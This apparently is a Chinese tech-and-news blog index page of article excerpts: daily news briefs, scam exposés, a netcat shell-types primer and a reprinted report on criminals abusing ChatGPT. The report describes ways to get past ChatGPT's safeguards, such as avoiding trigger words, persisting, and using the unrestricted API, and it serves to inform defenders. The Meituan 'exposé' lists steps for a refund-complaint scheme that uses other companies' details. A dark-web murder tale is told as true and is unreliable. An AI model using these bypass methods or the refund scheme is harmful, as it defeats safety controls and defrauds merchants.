• 什么是Tor?Tor浏览器更新有什么用?什么是Tor?Tor浏览器更新有什么用?
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开
  • 中华人民共和国网络安全法中华人民共和国网络安全法
大横幅1
大横幅2
到期时间:永久 到期时间:推广
到期时间:推广 小横幅4
今日发布0 篇文章 | 本站共发布了1897篇文章
  • ChatGPT骗局 | 3家美国政府机构被黑 | Signal软件可能在英国下架

    相关阅读 每周黑客新闻 视频讲解 本期视频,我们将为大家分析三个事件,第一个是不法分子在facebook中投放广告,并且仿真ChatGPT页面,最终投放恶意软件,经安全研究人员确认,改恶意软件实际上是Lumma stealer木马;第二个是三家美国政府机构被黑客入侵,FBI被黑客攻击、美国国防部敏感的电子邮件被曝光、美国法警局遭受了勒索软件攻击;第三个是英国政府疑似正在试图破坏端到端加密技术,打着...

    2023-03-07 237
  • netcat的三种shell操作

    0x00 三种shell shell 主要分为三种类型:反向 Shell、绑定 Shell 和 Web Shell。这些 shell 中的每一个都有不同的与我们通信的方法来接受和执行我们的命令。 外壳类型沟通方式Reverse Shell连接回我们的系统并通过反向连接让我们控制。Bind Shell等待我们连接到它并在我们连接后给予我们控制权。Web Shell通过 Web 服务器通信,通过 HT...

    2023-03-07 265
  • 揭秘全网爆火的美团赔付项目,免费分享,不建议操作

    这两天正在跑一个项目,如果有收益了会给大家说一声,年后真的找了太多项目,一直就想找个门槛不高,大家都能做的长期副业,可靠谱的真不多。   像是薅羊毛、走偏门这种东西,不是说看不上,但收益真的不稳,也学不到什么东西,毕竟不能天天为了挣那百儿八十的收益,费心费力,而且不知道什么时候就被人割一刀。   今天给大家揭秘一个朋友圈收费几百的项目,美团赔fu,只做揭秘防割,不建议操作。 项目拆解 一:项目原理   原理很简单,就是你点过外卖,然后去跟商家聊天,问商家要发票,大部分的商家是没有开通发票的,通过投诉,平台会赔fu订单金额。 二:操作教程 1:美团进入我的,点开-发-票。 2:找到你点过外卖的商家,问商家要发-票。 3:联系平台,继续要 4:平台会进行赔fu。 注意事项   如果需要提供发-票信息的话,去企查查、天眼查找个当地的公司信息;还有商家能提供发-票的话,那就换下一家。...

    2023-03-07 391
  • 3月7日新闻早讯,每天60秒读懂世界

    3月7日,农历二月十六,星期二 在这里,每天60秒读懂世界! 1、国家烟草专卖局:烟草行业去年实现工商税利总额超1.4万亿元,同比增长6.12%,创历史新高; 2、庹庆明代表:建议将"犬只伤人"的刑事责任写入刑法修正案;卓长立代表:建议将养老护理费、病人陪护费纳入个税抵扣;李为民委员:建议将肺癌筛查纳入医保报销;陆铭委员:建议随迁子女就地入学;魏新委员:建议奖励制止校外学生欺凌的个人; 3、黑龙江:力争用三年左右时间建设农村公路18000公里以上,到2025年,全省95%以上的乡镇实现通三级公路; 4、湖北出台最强政企购车补贴政策:最高补贴9万元,已涵盖了东风日产、东风标致、岚图等多个企业,共涉及7大品牌的56款车型。此轮补贴仅限于湖北省,截止时间为3月31日; 5、香港出台"高端人才通行证计划",清华、北大、复旦、浙大、上海交大、中科大、中大、南大以及华科等内地9所大学毕业生符合申请条件,提交申请后申请人最快4周可获香港身份; 6、台媒:5日下午,台一渔船在石垣岛周边海域翻覆,船上7人失踪; 7、数据显示:"甲流"持续五周上升,全国哨点医院流感阳性率超过新冠; 8、亚航被曝行李超重5公斤补收1807元:拍照被威胁不要上飞机。乘客:起初开价2612元,并且出具的发票,也不是合规发票,更不是亚航的收据; 9、外媒:疑因抵制总理内塔尼亚胡的司法改革,以色列航空公司飞行员拒载其出访; 10、当地6日,印尼西部廖内群岛省发生山体滑坡,造成至少10人死亡,数人失踪;加纳中部一卡车与客车相撞,造成至少22人死亡,多人受伤;外媒:当地6日,巴基斯坦西南部发生自杀式袭击,至少9名警察遇难,另有10人受伤; 11、伊朗发生大规模女学生中毒事件:受害者已超1000人,伊教育部长公开道歉,多名受害女生称:曾在中毒前闻到似橘子或腐烂鱼类的气味。有官员表示:或是反对女性接受教育的宗教极端势力所为; 12、外媒:印度因联合国大楼前的"反印海报"问题传召瑞士大使; 13、韩国公布二战劳工问题赔偿方案,日本:对此表示赞赏。美国:对这一"历史性"方案表示"赞赏";韩国:日韩将就解除出口管制启动磋商,日媒:迈出改善关系的一大步; 14、美媒:美官员称在美国港口营业的中国制造起重机或发挥间谍作用,外交部:草木皆兵; 15、俄罗斯顶级科学家被皮带勒死家中,曾研发新冠疫苗,自俄乌战争以来,已有数十起高官、名人神秘死亡事件;俄联邦安全局:俄亿万富翁差点被暗杀,手法类似杜金娜遇害事件,车底被安装炸弹; 【微语】好听的话别当真,难听的话别较真。这样你会过得轻松很多。...

    2023-03-07 202
  • 虚拟世界中需要注意的7种元宇宙犯罪

    在过去的几年里,元宇宙已经成为一个热门话题,用户对它可能带来的新功能和机会感到兴奋。但是,就像大多数技术一样,网络犯罪分子已经找到了利用元宇宙用户的方法。那么,用户应该注意哪些元宇宙犯罪和骗局呢? 1. 虐待及骚扰 大家对网络上的不当行为应该并不陌生,无论是欺凌、骚扰还是威胁。但是元宇宙已经把网络人身攻击的程度提升到了一个全新的水平。由于元宇宙使用虚拟现实“化身”进行交互,恶意用户可能会试图在虚拟世界中对受害者的“化身”进行物理攻击。 许多用户已经站出来讲述了他们在元宇宙中的骚扰经历,一些人甚至表示,攻击者在事件发生时对事件进行了截图或自拍。当然,这种在线攻击可能会令人非常痛苦,许多平台现在都在寻求打击这种行为。 言语虐待以及持续的骚扰也是元宇宙中一个巨大的担忧。在推特和脸书等知名的社交媒体平台上已经出现了这种情况,但在虚拟现实环境中,情况可能会变得更加极端。许多较大的平台已经建立了一套关于元宇宙内不当行为的规则。以Decentraland为例。这家公司发布了一份道德准则,所有用户在玩游戏时都必须遵守。 2. 网络钓鱼 网络钓鱼是一种流行的网络犯罪形式,现在正被用于元宇宙空间。在典型的网络钓鱼骗局中,恶意行为者会冒充可信实体,如合法公司,骗取受害者的数据或金钱。攻击通常会涉及恶意行为者提供的某种链接,受害者会认为它是完全无害的。但实际上,这个链接会重定向一个旨在窃取所有输入数据的网站。 在元宇宙中,攻击者通常会冒充知名品牌,如Decentraland或Roblox,以赢得目标的信任,并创造一种虚假的合法性氛围。例如,攻击者可能会伪装成一个想要出售虚拟土地的用户,引诱潜在的受害者,骗取他们至关重要的数据,比如钱包私钥。 网络犯罪分子还可以开发虚假的元宇宙应用程序,专门用于通过网络钓鱼窃取数据。因此,在继续下载之前,请务必审查您想要与之交互的任何元宇宙应用程序或平台是很重要的。借助一些检查链接是否安全的网站运行任何提供的链接,也可以帮助您确定是否正在与恶意平台进行交互。 3. 洗钱 在线洗钱行业的规模之大令人担忧,尤其是在非法暗网市场。加密货币是元宇宙的关键组成部分,是一种非常受欢迎的用于洗钱的资产,特别是因为加密货币比传统货币更难跟踪和去匿名化。利用元宇宙作为载体,网络犯罪分子可以在逃避检测的同时成功洗钱大量加密货币。即使是NFT也可以用来在元宇宙中洗钱。 虽然加密货币交易通常记录在公开的区块链上,其中显示了发送者和接收者的钱包地址,但某些加密货币能够保持所有交易完全匿名,例如门罗币和ZCash。这种被称为隐私币的加密货币非常适合那些想要洗钱并躲避执法部门监视的恶意行为者。 4. 身份盗窃 每个月都有成千上万的人成为身份盗窃和欺诈的受害者,攻击者通过这种犯罪方式牟取暴利。在元宇宙中,您通过化身拥有自己的数字身份。有了这个身份,您可以建立联系,购买土地,创建自己的虚拟世界。一些元宇宙用户已经拥有有价值的数字资产,如NFT或加密货币,网络犯罪分子也盯上了这些资产。 通过窃取别人的元宇宙身份,恶意行为者有机会获得有价值的数字资产和物品,这可能会给受害者造成巨大的经济损失。这很容易做到,特别是如果攻击者很好地获得了受害者的信任,能够访问身份盗窃所需的数据。 5. 恶意软件感染 恶意软件是网络犯罪分子最常用的诈骗和犯罪方法之一。这些恶意程序有能力修改、删除和窃取数据,以及远程控制系统以执行恶意操作。网络犯罪分子已经利用数千个在线平台传播恶意软件,元宇宙也不例外。 元宇宙用户和平台已经成为基于恶意软件的攻击的受害者,其中一些甚至构成了重大风险。例如,攻击者可以使用勒索软件加密受害者的账户或资产,使其几乎无法访问。此外,攻击者也可以使用网络钓鱼将恶意软件传播给元宇宙中毫无防备的受害者。 6. 社会工程 长期以来,社会工程一直是网络犯罪分子最喜欢的欺诈策略,现在这个问题也成为元宇宙中一个巨大的担忧。网络钓鱼属于社会工程的范畴,但犯罪分子还可以使用许多其他类似的策略来欺骗受害者。例如,元宇宙中的攻击者可能会与受害者建立关系,以便操纵他们进行诈骗。或者,攻击者可以执行诱饵攻击,诱使受害者泄露敏感数据。 考虑到元宇宙主要由社交互动组成,可想而知网络犯罪分子可以通过社会工程骗局实现什么,这着实令人担忧。 7. 影响力欺诈 有影响力的人现在在网上很流行,他们可以是演员、歌手、模特或网红等等。由于这些人在社交平台上拥有非常强大的影响力,他们经常被冒充来骗取粉丝和支持者的数据或金钱。在元宇宙中,这种骗局会对所有用户都构成风险。 当攻击者冒充有影响力的人时,他们可能会实施许多犯罪和骗局。例如,攻击者可能冒充有影响力的人向粉丝发送消息,然后,提供给他们虚假赠品的网络钓鱼链接,要求受害者注册某种计划,甚至向他们索要资产。如果攻击者仿冒能力很强,而受害者又不太了解诈骗的危险,那么就很有可能成功实施诈骗。 冒充网红的攻击者还可以通过发布与其骗局有关的帖子来撒更大的网,使他们能够接触到更多的潜在受害者。 元宇宙已经给用户带来了各种风险 虽然元宇宙相对较新,尤其是在主流圈子里,但它已经引起了恶意行为者的注意,他们正试图利用不知情的用户。这就是我们有必要了解当今各种各样的元宇宙犯罪的原因,这样您才能更好地保护自己免受这些危险人物的伤害。 ...

    2023-03-06 275
  • 3月6日新闻早讯,每天60秒读懂世界

    3月6日,农历二月十五,星期一 在这里,每天60秒读懂世界! 1、中国天气网:预计9-12日,将有一股强冷空气自西向东侵袭我国,部分地区气温下降幅度可达10~16℃,预计这股强冷空气或可达寒潮级别; 2、我国新一代载人运载火箭计划于2027年首飞,是为发射我国新一代载人飞船和月面着陆器而全新研制的载人火箭; 3、石家庄地铁:在指定店铺购物金额不限,就可免费乘地铁,此举是鼓励大家绿色出行; 4、台媒:岛内鸡蛋批发价明起再涨,从52元调整为55元,涨幅高达5.8%,再创新高,这是3周内第2度涨价; 5、重庆一知名火锅店被曝吃出煮烂死老鼠,工作人员:市监局已介入; 6、联合国秘书长谴责富裕国家和能源巨头对贫穷国家的"掠夺";卡塔尔宣布向最不发达国家捐款6000万美元; 7、外媒:美国一男子感染"食脑虫"后死亡,或因用自来水冲洗了鼻腔; 8、新加坡:明年新生儿父亲有薪陪产假从两周增至四周,政府考虑强制执行; 9、英国国防部:随着补给线的切断,乌克兰在巴赫穆特承受日益严峻的压力。该市通讯已被切断,俄乌双方正展开巷战; 10、外媒:韩国拟"替"日企支付二战劳工赔偿,日本或解除对韩贸易限制,韩在野党猛批:屈辱外交!; 11、法媒:伊朗宣布发现大型锂矿,储量或达"850万吨"。伊朗承诺配合国际核查监督,重开部分核设施内监控设备; 12、朝鲜外务省5日呼吁联合国,要求美国与韩国立即停止联合军事演习,称美韩军演正加剧有可能"失控"的紧张局势; 13、俄媒:普京日前接见了卡德罗夫的长子。乌媒:缺席普京国情咨文演讲,卡德罗夫或病重,已请外国名医救治; 14、德媒:德国军企莱茵金属表示,计划在乌克兰建2亿欧元坦克工厂,正与乌政府谈判,每年可生产多达400辆"黑豹"坦克; 15、美媒:两名乌克兰飞行员已前往美国接受驾驶F-16战机的训练,未来还将有10名以上的乌飞行员加入; 【微语】往事如烟,过去的既不能改变,也不能抹去。让过去过去,才能让未来到来。...

    2023-03-06 211
  • 【Tik Tok,Tik Tok插件,加速器,全网去水印软件】

    tiktok免拔卡可以注册(谷歌脸书有账号的可以注册) Tik Tok插件道具箱(强制去除Tik Tok广告下载视频去水印) 加速器(不用更新,免费版,建议开启全局模式) 万能下载视频去水印(任何视频一键去水印主页也可以速度快高清)     扫描下方QQ群二维码进群免费下载    ...

    2023-03-05 223
  • 2023年政府工作报告极简版来了!只有700字

    3月5日,李克强总理向十四届全国人大一次会议作政府工作报告,要点如下:   一、过去一年和五年工作回顾   过去一年: 全年国内生产总值增长3% 全年增值税留抵退税超过2.4万亿元 脱贫人口务工规模超过3200万人   过去五年: 国内生产总值增加到121万亿元,五年年均增长5.2% 粮食产量连年稳定在1.3万亿斤以上 城镇新增就业年均1270多万人 经过八年持续努力,近1亿农村贫困人口实现脱贫   二、今年发展主要预期目标 国内生产总值增长5%左右 城镇新增就业1200万人左右 居民消费价格涨幅3%左右 粮食产量保持在1.3万亿斤以上 三、对今年政府工作的建议 财政:积极的财政政策要加力提效。赤字率拟按3%安排 税费优惠:对现行减税降费、退税缓税等措施,该延续的延续,该优化的优化 就业:把促进青年特别是高校毕业生就业工作摆在更加突出的位置 疫情防控:推进疫苗迭代升级和新药研制,切实保障群众就医用药需求 消费:稳定大宗消费,推动生活服务消费恢复 政府投资:今年拟安排地方政府专项债券3.8万亿元 制造业重点产业链:集中优质资源合力推进关键核心技术攻关 数字经济:提升常态化监管水平,支持平台经济发展 民营经济:依法保护民营企业产权和企业家权益,鼓励支持民营经济和民营企业发展壮大 引进外资:推动外资标志性项目落地建设 防范化解重大经济金融风险:有效防范化解优质头部房企风险,改善资产负债状况。防范化解地方政府债务风险,优化债务期限结构 乡村振兴:发展乡村特色产业,拓宽农民增收致富渠道 绿色转型:推动重点领域节能降碳,持续打好蓝天、碧水、净土保卫战 住房:支持刚性和改善性住房需求,解决好新市民、青年人等住房问题 教育:推进义务教育优质均衡发展和城乡一体化 医疗:推动优质医疗资源扩容下沉和区域均衡布局 社会保障:加强养老服务保障,完善生育支持政策体系 港澳发展:支持港澳发展经济、改善民生 台湾问题:坚定反“独”促统,推动两岸关系和平发展,推进祖国和平统一进程   来源:人民日报客户端 ...

    2023-03-05 231
  • 没事别乱逛暗网deep web:一个外国人的恐怖暗网经历

    暗网的部份区域有一定的危险性,因此暗网内的许多内容在这里看看就好,不要太深入,更不要参与,否则不知道会发生什么事。在国外,就因为有人太深入,连性命都没了。 有一位外国人伯特,他在学校的活动上,认识了一位朋友德瑞克,他是一个计算机高手,平常没事就会骇进到其他人计算机,窃取一些照片或数据。例如有一次在学校上计算机课时,因为感到无聊,所以就利用教室内的计算机与网络,骇进校长的计算机里,植入一些语法执行文件,让校长一开计算机,就会进到色情网站;当这名校长在开会时,打开他的计算机后,直接显示在会议大屏幕的是色情网站画面,让他感到非常尴尬。   有一次德瑞克邀请一些朋友到他家玩,伯特是其中一位。因为这些朋友对于德瑞克的黑客能力颇为惊讶,因此他们此次聚集到他家中,目的之一是为了要请德瑞克教他们计算机。由于伯特本身会一些简单的上暗网知识,包括Python语法、洋葱浏览器的使用方法,但却不会骇进其他人的计算机,于是他问德瑞克是怎么办到将语法植入其他人的计算机。德瑞克回他,因为他是职业级黑客。   伯特希望德瑞克能够教他一些黑客知识,然而德瑞克却先要他进入暗网,并找到一些很深层的论坛,如马里亚纳深网里面的一些数据库或论坛,但伯特感到特别害怕,因为他深知马里亚纳深网进去后,一个不小心,就会被反追踪,不是被美国联邦调查局追到,就是被一些毒枭或黑帮给抓到。不过德瑞克则跟他说,因为他的所有知识都是从马里亚纳深网学到,如果不进到深网,德瑞克则无法跟他说确实的学习数据位置。当伯特还在犹豫时,德瑞克向他保证绝对没有问题,因德瑞克进出太多次深网,已属大师的级别了。   当伯特还在犹豫时,德瑞克已打开计算机,他很快地进到了暗网。由于伯特自己也是暗网玩家之一,他深知暗网的危险性,所以当他听到德瑞克很有自信地回答他时,就知道情况不是很妙。德瑞克此时打开一个文件档,里面填写着一堆以onion为结尾的网址,还有用户名称及密码,接着他复制其中一个网址,贴到洋葱浏览器上,进去后,再输入用户名称及密码。伯特看到这边时,他突然说有事要回家,无法再看下去了。德瑞克则将网址、使用者名称、秘码交给伯特,要他回家后用他自己的计算机看。   当伯特回到家,处理完一些事后,突然想起德瑞克交给他的信息,于是就用这些信息进到马里亚纳深网的黑客论坛。虽然伯特知道其危险性,但他同时在好奇心趋使下,一股脑儿地进到了这个黑暗的禁地。   就在他一输完账号及密码进去时,他的计算机屏幕突然全部变黑,过几秒后,又自动恢复正常,此时他发现他的桌面多了一封加密的文件档,档名写着 “这是给德瑞克的讯息”。当然以伯特的功力,是无法打开此信,因此他打电话给德瑞克,而德瑞克也很快地到了他的家。   当德瑞克解密讯息后,发现写的是 “你居然敢透露我们的讯息,我一定会让你死”,署名的是深网之主。伯特此时害怕了起来,但德瑞克认为,这个讯息只是论坛某个人开的玩笑,并不放在心上,也同时嘲笑着伯特的胆小。   过了几天,德瑞克的妈妈打给伯特,问德瑞克的下落,但伯特自跟德瑞克共同解谜完,离开他家后,就再也没有联络他了,德瑞克妈妈只好报警。此事过了数周后,有一天,伯特似乎着魔似地,居然用德瑞克给的信息,再度进到了黑客论坛。当他一进去时,画面出现一张照片,是德瑞克惨死的照片。照片里的德瑞克,似乎被惨忍地凌虐过,全身伤痕躺在一张床上,他的双眼并出,嘴里插着一根十字架,胸部被利刃割开。 这时他吓到马上直接拔计算机插头,心情一直无法平复,整个人呆坐在椅子上至少有一小时之久。过了几天,他辗转得知,有人发现德瑞克陈尸在郊区的一栋空房里,死状非常恐怖,据说是被某种仪式给处刑。在经过此事后,伯特别说不敢上暗网,甚至连网络都不敢上,深怕下个被处刑的是他自己。 ...

    2023-03-05 425
  • 测试cs

    三年老店Kirin小卖铺 全网优质权益会员批发零售货源站 不谈稳定的货源只谈有稳定的售后 记得收藏本站,避免下次丢失回家的路 各种低价年费/话费/电费/抽奖/权益业务 时效:自动充值=秒,低价代充=1-3天 开单中不想要全部支持退款,暂停开单! 本站显示价格均为最低,提升等级低价下单 客服QQ:2155890353 客服VX:Kirinblog       ...

    2023-03-05 未分类 207
  • ChatGPT成为暗网的“最热门话题”,因为网络犯罪分子希望将AI作为武器

    据网络安全研究人员称,关于ChatGPT的讨论已经开始充斥在暗网的论坛上,因为黑客们正在寻求利用人工智能(AI)聊天机器人的方法。 在暗网上,也就是通过传统网络浏览器无法访问的互联网部分,有关ChatGPT的新帖子数量在1月至2月期间增长了7倍,而线程的受欢迎程度上升了145%。 Check Point Software Technologies本月早些时候报告称,网络犯罪分子绕过了ChatGPT的安全措施来生成恶意软件。Check Point研究人员在ChatGPT发布后监控了暗网论坛,发现了威胁行为者讨论使用聊天机器人“改进”恶意软件代码的实例。研究人员测试了聊天机器人的编码能力,看看它能为黑客提供什么帮助。 “使用ChatGPT 和 ChatGPT-3,我们没有看到创建真正复杂的东西的能力。”Check Point威胁情报组经理Sergey Shykevich说,“这主要是关于更多的人将进入他们的潜在开发者网络犯罪分子圈子并开发工具,它可以提高复杂威胁的成本效率。” 尽管聊天机器人在编码方面不那么复杂,但ChatGPT可以帮助简化流程。聊天机器人是创建简单恶意软件或为需要帮助的人(例如低技能黑客和脚本小子)改进恶意软件的有用平台。 “他们可以提交代码块并验证勒索软件代码中没有错误或漏洞,或者改进代码或编写网络钓鱼电子邮件作为其感染链的一部分,”Shykevich说。“一个从来都不是开发人员并且从未创建过代码或恶意代码的人现在突然能够尝试创建恶意代码。” 多个安全公司对此进行了分析,并将ChatGPT的利用描述为“暗网最热门的话题”。 论坛上讨论的主题包括让人工智能创建恶意软件的方法、如何利用ChatGPT以及使用它进行网络攻击的方法。 网络安全公司Norton的一份单独报告警告说,网络犯罪分子可能会被这种先进的聊天机器人吸引,因为它能够产生对人类来说无法区分的反应。 使用人工智能软件的一种潜在攻击形式被称为网络钓鱼,目标被诱骗泄露个人信息,从而危及他们的在线账户。 黑客一直在寻找让人工智能执行此类攻击的方法,以克服ChatGPT的创建者OpenAI设置的障碍。 这家人工智能研究公司声称其技术“经过训练可以拒绝不适当的请求”,但是之前已经暴露了某些漏洞,这些漏洞允许用户生成基本的恶意软件。 网络安全专家称:“像ChatGPT这样的聊天机器人可以在很多方面让我们的生活更轻松,比如执行平凡的书面任务、总结复杂的主题或建议假期行程。然而,对于网络犯罪分子来说,革命性的人工智能可能是许多骗局中缺失的一块拼图。” “令人担忧的是,在上个月,暗网上有关ChatGPT的讨论已经从简单的‘作弊’和变通办法——旨在鼓励ChatGPT做一些有趣或意想不到的事情——演变为完全控制该工具并将其武器化。” 非法使用ChatGPT 早在2022年12月,Reddit用户就已经讨论过“越狱”或某些提示,成功推翻了ChatGPT的防御系统。用户分享他们欺骗聊天机器人做出歧视性或荒谬的陈述。 虽然戳破聊天机器人的防御系统最初是为了展示聊天机器人的缺陷,但威胁者已经非法利用了其弱点。Check Point研究人员观察到,威胁行为者通过三种方式利用OpenAI的API生成恶意软件。 2022年12月21日,一名用户名为USDoD的威胁行为者在暗网论坛上透露,他使用ChatGPT生成了他的第一个脚本。这个多层加密的Python工具可以用来加密一个人的文件,但它也可以作为一个勒索软件的模型。 USDoD承认他以前从未创建过脚本,这引起了人们的担忧,即聊天机器人会让那些没有技术技能的人创建恶意软件并造成重大损害。NCC Group的首席科学家Chris Anley称,虽然ChatGPT可能无法生产完整的勒索软件,但用户很容易请求生成一个可以被恶意使用的加密脚本。 尽管这段代码可能存在潜在危害,但Shykevich表示,源自ChatGPT的编码USDoD“确实需要一些小的调整才能真正使其正常工作。” 在早些时候的一份报告中,Check Point发现另一名黑客解释说,他在一周后使用ChatGPT重新创建了一个基于python的信息窃取程序代码,该代码可用于从系统中复制和泄露PDF、图像和Office文档等文件。同一位用户随后分享了他编写的一个简单的Java代码,该代码使用PowerShell下载PuTTY软件客户端,但它可以被修改为下载和操作任何程序。 CheckPoint研究人员还发现一名黑客展示了ChatGPT在创建暗网市场中的作用。黑客发布了带有第三方API的代码,该API包含当前加密货币价格,可用于进行非法购买。 绕过ChatGPT限制 一开始,一些安全研究人员认为ChatGPT用户界面中的限制很薄弱,并发现威胁行为者可以轻松绕过障碍。从那以后,Shykevich说OpenAI一直在努力改进聊天机器人的限制。 “我们看到ChatGPT的用户界面的限制每周都会提高很多。所以现在使用ChatGPT进行恶意或滥用活动更加困难。”他说。 但网络犯罪分子仍然可以通过使用和避免某些允许用户绕过限制的词语或短语来滥用该程序。NCC Group商业研究总监Matt Lewis将与在线模型的交互称为涉及计算的“艺术形式”。 Lewis说:“如果你避免使用恶意软件这个词,而只是要求它向你展示加密文件的代码示例,那么它就会故意这样做。”“它有一种喜欢被指示的方式,并且有一些有趣的方法可以让你以多种不同的方式让它做你想让它做的事情。” Lewis展示了该程序将如何“编写一个加密脚本”,尽管没有达到完整的勒索软件的要求,但它仍然可能很危险。“这将是一个很难解决的问题,”Lewis谈到绕过时说,并补充说,对于OpenAI来说,针对上下文和意图的语言监管将极其困难。 更复杂的是,Check Point研究人员观察到,威胁行为者采用Telegram机器人的GPT-3模型的API,称为text-davinci-003,而不是ChatGPT,来推翻聊天机器人的限制。 ChatGPT只是OpenAI模型的一个用户界面。这些模型可供开发人员将后端模型与他们自己的应用程序集成。用户通过API消费这些模型,而这些API并没有受到限制的保护。 “从我们看来,OpenAI对ChatGPT界面设置的障碍和限制主要针对那些通过API使用模型的人。”Shykevich说。 威胁行为者还可以通过向聊天机器人发出准确的提示来规避限制。Cyber​​Ark自ChatGPT推出以来就对其进行了测试,并发现了限制中的盲点。通过反复的坚持和要求,它将提供所需的编码产品。Cyber​​Ark研究人员还报告说,通过不断要求ChatGPT并每次渲染新的代码,用户可以创建高度规避的多态恶意软件。 多态病毒可能非常危险。但Anley指出,已经有在线工具和框架可以用来制作它们。ChatGPT的创建能力对于不熟练的编码人员和脚本小子来说是最有益的。 “就攻击者而言,这不是一种新的能力……也不是一种特别有效的方法来生成你的恶意软件的变种。”Anley说,“已经有一些工具在这方面做得更好。它有可能是新的,因为它可能允许不太熟练的攻击者生成可能危险的代码。” 赌注有多高? 因为ChatGPT的输出往往是不完美的,只有伴随着熟练的黑客的作用,能够对代码进行必要的调整和补充,它们才很可能是有害的。 “可能需要知识渊博的人才能将其转化为武器化的漏洞,一种武器化的恶意软件。”Anley说。 让聊天机器人在创建恶意软件方面更不实用的是,已经有许多工具可用于创建功能性恶意软件。在我们看到AI程序的进步之前,以这种方式使用ChatGPT并不是完全有利的。 “虽然你确实可以以这种方式使用模型来生成一些不好的东西,但我们已经可以以一种从攻击者的角度来看可能更有效、更安全的方式来生成这种类型的恶意软件。”Anley说。 然而,ChatGPT在生成逼真的网络钓鱼电子邮件方面一直很有效,这些电子邮件在标有拼写错误和语法错误时通常无法令人信服。但是使用OpenAI的GPT-3大型语言模型系列构建,ChatGPT可以生成有说服力的电子邮件。 “语言非常好,非常紧凑,所以你可能无法像以前那样区分它,”Lewis说。 为了解决这个问题,OpenAI将继续打击ChatGPT的限制。但威胁行为者很可能会继续寻找滥用该技术的方法。Shykevich警告说,虽然关于聊天机器人节制、限制和审查的讨论很重要,但保障措施永远不足以完全终止恶意活动。 “如果我们不讨论或者限制措施没有从一开始就实施,那么滥用就会变成一个怪物。”Shykevich说。“但也没有办法将滥用减少到零。” 有关ChatGPT ChatGPT目前是世界上增长最快的应用程序,在推出后的头两个月内在全球范围内拥有1亿用户。OpenAI 聊天机器人已帮助超过1亿用户(每天约1300万人)根据请求编写文本、音乐、诗歌、故事和戏剧。它还可以回答测试问题,甚至可以编写软件代码。 推出三个多月后,它的受欢迎程度持续增长。根据数据智能平台Similarweb的数据,2月份聊天机器人的访问量增长了83%,日访问量达到约4500万次。 瑞银分析师在1月份的一份报告中写道:“在关注互联网领域的20年中,我们无法回忆起消费者互联网应用的快速增长。” 相比之下,TikTok在全球推出后用了9个月才达到类似的受众,而Instagram则用了2.5年多。   超低价ChatGPT账号:http://299r.cn/xmp/?mod=buy&tid=12...

    2023-03-05 232
  • QQ附近小程序引流

    一个混迹于互联网的老鸟,我不敢说资历有多深,但是很多项目也是从广告就能看出一些端倪,但是这次的经历属实让我佩服骗子的智商。接下来就给大家做一个详细的复盘,希望大家能提高警惕,避免上当受骗。   申明一点:本文仅作揭秘,切勿从中学习用于不法操作! 套路拆解 一:套路起始 先给大家上个图 不知道大家什么感觉,我先说说自己当时的想法, 第一,这个项目肯定是灰色的,大概率就是引流s粉。 第二,仔细阅读后感觉风险性极小,账号一直在手里,不会泄露密码。 第三,暴利,不管是文字还是截图,诱惑非常大。 说实话,我是不能拒绝这样的广告的,哪怕我明知道他有可能是假的,我也想去一探究竟。 结果,就是这个想法一下子落入骗子的圈套,套路开始了。 二:套路过程 首先拉了一个项目群,人数刚开始差不多30人,项目方有个叫安安老师的开始发言,先是发了一个所谓的改号视频,就是让你把QQ附近小程序的头像给改成他发你的图片,就是下边这张图。 如果不注意,你会看见中间有文字吗?图片还是我放大之后的。到这里其实也很正常,改个头像嘛,大不了不做了再改回来。 这样想你就大作特错了,人家还有要求。 你如果改完资料的话,基本就算帮他完成了,他说的8个小时就是为了拖延你的时间,免费用你的账号帮他引流了8个小时。,最后你还一分钱拿不到。 这时候你就会心存侥幸,都开始做了,怎么也得看看到底能不能拿到钱。 我也是先看看他们是怎么操作的,就安稳等了八个小时,这中间还发生了一件很有趣的事情,让我不得不佩服这些骗子的高明。 群里有个兄弟反应过来了,破口大骂,结果直接被踢了,然后群里的人一个没走,应该都是想再看看。 然后群主就开始不停的发收益截图,一是巩固信任,二是把聊天顶上去。 群里一直不断进人,现在已经有60个人了。 套路依旧。 套路方式 1:你改资料之后会有审核时间,一个月只允许修改一次附近小程序的资料,你一旦修改,就相当于替他们引流一个月。而且你还没办法终止。 我关闭了定位不知道会不会有用。 2:不停的告诉你,不能进附近小程序,必须8小时之后再看,就是怕你发现,有所动作。 3:不管你怎么做,对方都是白占便宜,一点损失没有。 三:总结 为什么会这么多人前赴后继的去进坑呢?我总结了以下三点 1:对QQ附近功能的了解有限 2:暴力赚钱的欲望 3:侥幸的心理 至于他会给你结账,想都不要想!你只是引流,在他们那成交都是未知数,他们凭什么给你结账,免费的劳动力用的多好。 这次真的让我大开眼界,活到老学到老,互联网的水真的太深了。在此,也奉劝各位,一定要多看,多了解,不要着急参与进去,像很多项目,你在群里呆上一段时间就能发现很多问题,然后你就能确定这个项目到底靠不靠谱。...

    2023-03-04 251
  • 3月4日新闻早讯,每天60秒读懂世界

    3月4日,农历二月十三,星期六 在这里,每天60秒读懂世界! 1、央行:未来将根据经济发展情况的变化和需要,统筹增长和物价,适时适度调整货币政策工具; 2、传染病专家:本轮甲流或将在3月下旬进入尾声,流感也会有重症的风险; 3、潘保春代表:建议提供免费墓地和骨灰盒,严查殡葬业价格乱象;李君代表:建议直播平台每个账号日打赏额不超100元;陈众议代表:建议试行十二年义务教育,中考普职分流延迟到高考,事关提高全民索质,利于生"三孩"; 4、厦门:人防导航平台正式上线,可匹配最近防空掩蔽点,增强城市防空防灾能力; 5、当地3月2日,美国商务部以涉及国家安全等无理理由,将香港华大基因、浪潮集团、龙芯中科、盛科通信等28个中国实体列入实体清单;商务部:美方以所谓涉俄等为由对中国实体制裁,严重损害企业合法权益; 6、埃及胡夫金字塔发现长9米宽2.1米新通道:位于"巨大神秘空间"上方!专家:可能是通向其它空间的通道; 7、阿根廷外交部长当面通知英国外交大臣:终止"福拉多里-邓肯协议",提议重启马岛主权谈判。英方回应:阿方的决定"令人失望"; 8、外媒:时隔5年,韩美将再度举行大规模联合军演,于本月13日至23日举行; 9、美媒:印要买美数十架MQ-9B武装无人机部署北部边境,若协议达成的,印度将成为非美国盟友中首个购买这种武装无人机的国家; 10、美国南加州持续暴雪:多个国家公园关闭,逾十万居民家中断电,积雪深度或将破纪录; 11、欧盟:推迟决定是否于2035年在境内禁售内燃机汽车。原计划在3月7日作出最终决定; 